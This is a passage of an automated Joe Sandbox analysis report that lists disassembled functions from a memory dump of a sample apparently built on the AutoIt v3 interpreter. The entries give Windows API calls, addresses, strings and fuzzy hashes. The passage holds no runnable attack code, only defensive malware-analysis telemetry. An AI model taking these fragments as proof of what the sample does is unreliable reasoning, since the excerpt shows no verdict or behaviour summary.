Instruction ID: d749c8885b2e1b9e2b8bc39c65162eb093dd0267c07bf0f107756307317f07a3
Opcode Fuzzy Hash: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
Instruction Fuzzy Hash: AB3139B6A0AB46CAE700EB91FC443A8B374BB46B54F810139DD4D03BA8DF7DE0548724

Function 00007FF7A51E7348 Relevance: 13.8, APIs: 9, Instructions: 272
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7A51E7078: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51E70B9
Part of subcall function 00007FF7A51E7078: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51E7136
Part of subcall function 00007FF7A51E7078: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51E7187

CreateFileW.KERNELBASE ref: 00007FF7A51E7449
CreateFileW.KERNEL32 ref: 00007FF7A51E74A5
GetLastError.KERNEL32 ref: 00007FF7A51E74D9
GetFileType.KERNELBASE ref: 00007FF7A51E74EE
GetLastError.KERNEL32 ref: 00007FF7A51E74F8
CloseHandle.KERNEL32 ref: 00007FF7A51E752B
CloseHandle.KERNEL32 ref: 00007FF7A51E7684
CreateFileW.KERNEL32 ref: 00007FF7A51E76BC
GetLastError.KERNEL32 ref: 00007FF7A51E76CB

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
Instruction ID: af6c8d531d3c8605d0ed069a1d1f40e012b83fb518f980a49bb0571a6b4062f6
Opcode Fuzzy Hash: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
Instruction Fuzzy Hash: 08C1E133B16A8186EB55DF64E4417BC77A1EB4ABA8F421225DE1E5B3E9CF38D411C310

Function 00007FF7A51B25BC Relevance: 12.4, APIs: 8, Instructions: 442
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetInputState.USER32 ref: 00007FF7A51B26DA
timeGetTime.WINMM ref: 00007FF7A51B28BC
PeekMessageW.USER32 ref: 00007FF7A51B29E3
TranslateMessage.USER32 ref: 00007FF7A51B2A23
DispatchMessageW.USER32 ref: 00007FF7A51B2A2D
PeekMessageW.USER32 ref: 00007FF7A51B2A47

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Message$Peek$DispatchInputStateTimeTranslatetime
String ID:
API String ID: 3249950245-0
Opcode ID: b0d5c899f7f315bbab548dcb41821af8f2ed58059bb4773332668f9261cfd511
Instruction ID: f8319a0a9fc0d43f5f1db16f2f0dda69aaac37c2dd0b667e0bff0d934e679d0d
Opcode Fuzzy Hash: b0d5c899f7f315bbab548dcb41821af8f2ed58059bb4773332668f9261cfd511
Instruction Fuzzy Hash: C722B872A0E68286EB66AB24E4403B9B7A0EB46F44F960136D75D436FDCF3DE445C720

Function 00007FF7A51A3CBC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32 ref: 00007FF7A51A3D0C
CreateWindowExW.USER32 ref: 00007FF7A51A3D5F
ShowWindow.USER32 ref: 00007FF7A51A3D75

Strings

edit, xrefs: 00007FF7A51A3D18
AutoIt v3, xrefs: 00007FF7A51A3CC8
d, xrefs: 00007FF7A51A3CF4

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Window$Create$Show
String ID: AutoIt v3$d$edit
API String ID: 2813641753-2600919596
Opcode ID: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
Instruction ID: ccad08e07e92db463724672b65e1602a979ec4d6e5cd9ab4e954ba8da4ad1160
Opcode Fuzzy Hash: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
Instruction Fuzzy Hash: BA2193B2A29B41C6E710DB50F848769B3F0F749B99F824238E64D467A8CF7DD045CB10

Function 00007FF7A51A7EC0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7A51C2D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7A51A7FA5), ref: 00007FF7A51C2D8E
Part of subcall function 00007FF7A51C2D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7A51A7FA5), ref: 00007FF7A51C2D9C
Part of subcall function 00007FF7A51C2D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7A51A7FA5), ref: 00007FF7A51C2DAC
Part of subcall function 00007FF7A51C2D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7A51A7FA5), ref: 00007FF7A51C2DBC
Part of subcall function 00007FF7A51C2D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7A51A7FA5), ref: 00007FF7A51C2DCA
Part of subcall function 00007FF7A51C2D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7A51A7FA5), ref: 00007FF7A51C2DD8

Part of subcall function 00007FF7A51BEEC8: RegisterWindowMessageW.USER32 ref: 00007FF7A51BEF76

GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A51A106D), ref: 00007FF7A51A8209
OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A51A106D), ref: 00007FF7A51A828F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A51A106D), ref: 00007FF7A51ED36A

Strings

AutoIt, xrefs: 00007FF7A51A7F46

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: AutoIt
API String ID: 1986988660-2515660138
Opcode ID: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
Instruction ID: 7085a2678b0a005056312d5b9d7a1b3a0b60b8a77f634f65de4cbbdab1573a7d
Opcode Fuzzy Hash: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
Instruction Fuzzy Hash: A6C1E6A2D1AB4AC5E640EB95EC800F4B7A4BF96B50F920236E54D427B9DF7CA141C7A0

Function 00007FF7A51A72C8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcscpy.LIBCMT ref: 00007FF7A51A739E
Shell_NotifyIconW.SHELL32 ref: 00007FF7A51A73AC
LoadStringW.USER32 ref: 00007FF7A51ECE12

Strings

Line: , xrefs: 00007FF7A51ECE52

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: IconLoadNotifyShell_Stringwcscpy
String ID: Line:
API String ID: 3135491444-1585850449
Opcode ID: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
Instruction ID: 76e40777ba9bbc541b5e5e55862224e29e793b5aeebf507c8aa21f607f708ed5
Opcode Fuzzy Hash: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
Instruction Fuzzy Hash: AE41566260E68696E722FB14F8402F9A361FF46B44FC65035E64C066BEDF7CD644C760

Function 00007FF7A51A3F04 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32 ref: 00007FF7A51EBAA2

Part of subcall function 00007FF7A51A56D4: GetFullPathNameW.KERNEL32(?,00007FF7A51A56C1,?,00007FF7A51A7A0C,?,?,?,00007FF7A51A109E), ref: 00007FF7A51A56FF

Part of subcall function 00007FF7A51A3EB4: GetLongPathNameW.KERNELBASE ref: 00007FF7A51A3ED8

Strings

au3, xrefs: 00007FF7A51EBA80
Run Script:, xrefs: 00007FF7A51EBA4D
AutoIt script files (*.au3, *.a3x), xrefs: 00007FF7A51EBA74

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
API String ID: 779396738-2360590182
Opcode ID: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
Instruction ID: f18290bdf5bbf22cc43a3bdd13bfc32d2b76ac9adfc4515ffc7538f3cc4750ff
Opcode Fuzzy Hash: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
Instruction Fuzzy Hash: FC314F62609B8185E711EF21E8401B9B7A4FB4AF84F994135DE4C47BAADF3CD545CB10

Function 00007FF7A51C4610 Relevance: 4.6, APIs: 3, Instructions: 67timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A72C8: wcscpy.LIBCMT ref: 00007FF7A51A739E
Part of subcall function 00007FF7A51A72C8: Shell_NotifyIconW.SHELL32 ref: 00007FF7A51A73AC

KillTimer.USER32 ref: 00007FF7A51C46A8
SetTimer.USER32 ref: 00007FF7A51C46BD
Shell_NotifyIconW.SHELL32 ref: 00007FF7A520AAAD

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: IconNotifyShell_Timer$Killwcscpy
String ID:
API String ID: 3812282468-0
Opcode ID: 1dc440ecac87e2ff0ffd0982a4a0d0d2f1018b32bcde9ffe5d1424b8b2f1a591
Instruction ID: af585498251d955fe82139582c5a982e6e301667f3027c94d1a2ff2d317ff403
Opcode Fuzzy Hash: 1dc440ecac87e2ff0ffd0982a4a0d0d2f1018b32bcde9ffe5d1424b8b2f1a591
Instruction Fuzzy Hash: EC31D562A0E79187E7629B21A4402BDB7A8E746F84F994035DE4D077EDCF2CD644C760

Function 00007FF7A51A6F60 Relevance: 4.6, APIs: 3, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF7A51A6F52,?,?,?,?,?,?,00007FF7A51A782C), ref: 00007FF7A51A6FA5
RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF7A51A6F52,?,?,?,?,?,?,00007FF7A51A782C), ref: 00007FF7A51A6FD3
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00007FF7A51A6F52,?,?,?,?,?,?,00007FF7A51A782C), ref: 00007FF7A51A6FFA

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
Instruction ID: b59f40747a19aa6740ffe6a99a6dc4c4384e428e3b9065c81f9bcf63ec610011
Opcode Fuzzy Hash: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
Instruction Fuzzy Hash: 5821A932B19B4187D7129F25F55096EB3A4FB5AB80F861130EB8C83B28DF39E5048B40

Function 00007FF7A51C9118 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF7A51C90FC), ref: 00007FF7A51C9140
TerminateProcess.KERNEL32(?,?,?,00007FF7A51C90FC), ref: 00007FF7A51C914B
ExitProcess.KERNEL32 ref: 00007FF7A51C915A

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
Instruction ID: 048dd353d72b1e64e4fc1e2a81127b37a595e9b48008759805f057065ed8d9b3
Opcode Fuzzy Hash: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
Instruction Fuzzy Hash: 1FE01260B0674182EB057B61AC8527553529F56F61F865438C80E033EADE3EF4498220

Function 00007FF7A51B66C0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 466COMMON

Download Yara Rule

APIs

_Init_thread_footer.LIBCMT ref: 00007FF7A51B6C05

Strings

CALL, xrefs: 00007FF7A51B6BCE

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 24061c5982f2d3e817e045593c76e51459b54cde2f485c3431a9fa5c614c0b1a
Instruction ID: 6ed7b75bd80835ec5442cf6c8c327ee6e91791493497e51220f2a7c400733120
Opcode Fuzzy Hash: 24061c5982f2d3e817e045593c76e51459b54cde2f485c3431a9fa5c614c0b1a
Instruction Fuzzy Hash: 4422AE72B0A6418AEB11EF64E4402BCB7B1FB56F88F924536DA4D577A9CF38E445C320

Function 00007FF7A51A6838 Relevance: 3.1, APIs: 2, Instructions: 100fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00007FF7A51A68A2

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
Instruction ID: 8bae4b04841130b2f641eceddb0da4c1851c03f6eed3ef0f6585da40e5ccaf31
Opcode Fuzzy Hash: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
Instruction Fuzzy Hash: 774181B2D0A742C6E726AF10F840339A7A0EB56FA8F864231DA6D076EDCF3DD4058750

Function 00007FF7A51A6460 Relevance: 3.1, APIs: 2, Instructions: 91libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A6D64: LoadLibraryA.KERNEL32(?,?,?,00007FF7A51A6490), ref: 00007FF7A51A6D7B
Part of subcall function 00007FF7A51A6D64: GetProcAddress.KERNEL32(?,?,?,00007FF7A51A6490), ref: 00007FF7A51A6D93

FreeLibrary.KERNEL32 ref: 00007FF7A51A64BA
LoadLibraryExW.KERNELBASE ref: 00007FF7A51A64E4

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 392ad9f8a410b3ba7add488219b3c7835b0d92f2120495b543ba498714cf74fb
Instruction ID: 35f5c5b243823d37eae830a9d290f9671588b1d5577107be7e95043d666e0e12
Opcode Fuzzy Hash: 392ad9f8a410b3ba7add488219b3c7835b0d92f2120495b543ba498714cf74fb
Instruction Fuzzy Hash: 24417322B1665286EB12EF25E8403BC63A0EB45F8CFC64131EA4D476AEDF3CD945C720

Function 00007FF7A51A6258 Relevance: 3.1, APIs: 2, Instructions: 72windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32 ref: 00007FF7A51A6350

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 32275c29c25acc732941c8e4684a790687827c850461c861846bda9725fb2c55
Instruction ID: 87ad7832de9da72c032f08900268595bbe62d05af08a7f72aa09db90c6769aca
Opcode Fuzzy Hash: 32275c29c25acc732941c8e4684a790687827c850461c861846bda9725fb2c55
Instruction Fuzzy Hash: 3F414A72A0AB4586E752AF11E8403B9B3A4FB4AF88F850135EA4C077ADDF7CE545C760

Function 00007FF7A51A3730 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00007FF7A51A3756

Part of subcall function 00007FF7A51C9334: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51C9348

Part of subcall function 00007FF7A51A36E8: SystemParametersInfoW.USER32 ref: 00007FF7A51A3705
Part of subcall function 00007FF7A51A36E8: SystemParametersInfoW.USER32 ref: 00007FF7A51A3725

Part of subcall function 00007FF7A51A37B0: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7A51A3785), ref: 00007FF7A51A37F2
Part of subcall function 00007FF7A51A37B0: IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF7A51A3785), ref: 00007FF7A51A3807
Part of subcall function 00007FF7A51A37B0: GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF7A51A3785), ref: 00007FF7A51A388D
Part of subcall function 00007FF7A51A37B0: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7A51A3785), ref: 00007FF7A51A3924

SystemParametersInfoW.USER32 ref: 00007FF7A51A3797

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme_invalid_parameter_noinfo
String ID:
API String ID: 4207566314-0
Opcode ID: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
Instruction ID: c57384df41f5a0f69948e3db7e2f02a10ad543430fe6b504c80aabe1ce95003a
Opcode Fuzzy Hash: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
Instruction Fuzzy Hash: 8E01E8E0E0B2469AF71ABBA1BC156B5F661AF46F00FC60035E54D463FADE2DB4858720

Function 00007FF7A51DB3C0 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL ref: 00007FF7A51DB3D6
GetLastError.KERNEL32 ref: 00007FF7A51DB3E8

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
Instruction ID: 55368dfd273da2f9e79119bbb68d0ef678450865284d0ca40369511e049486ff
Opcode Fuzzy Hash: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
Instruction Fuzzy Hash: C3E08652F0B14383FF067BF2EC44074A2915F5AF80FC64030C90D862B9DE2CE4454B20

Function 00007FF7A51E04B8 Relevance: 2.6, APIs: 2, Instructions: 55COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00007FF7A51E051B
GetLastError.KERNEL32 ref: 00007FF7A51E0525

Memory Dump Source

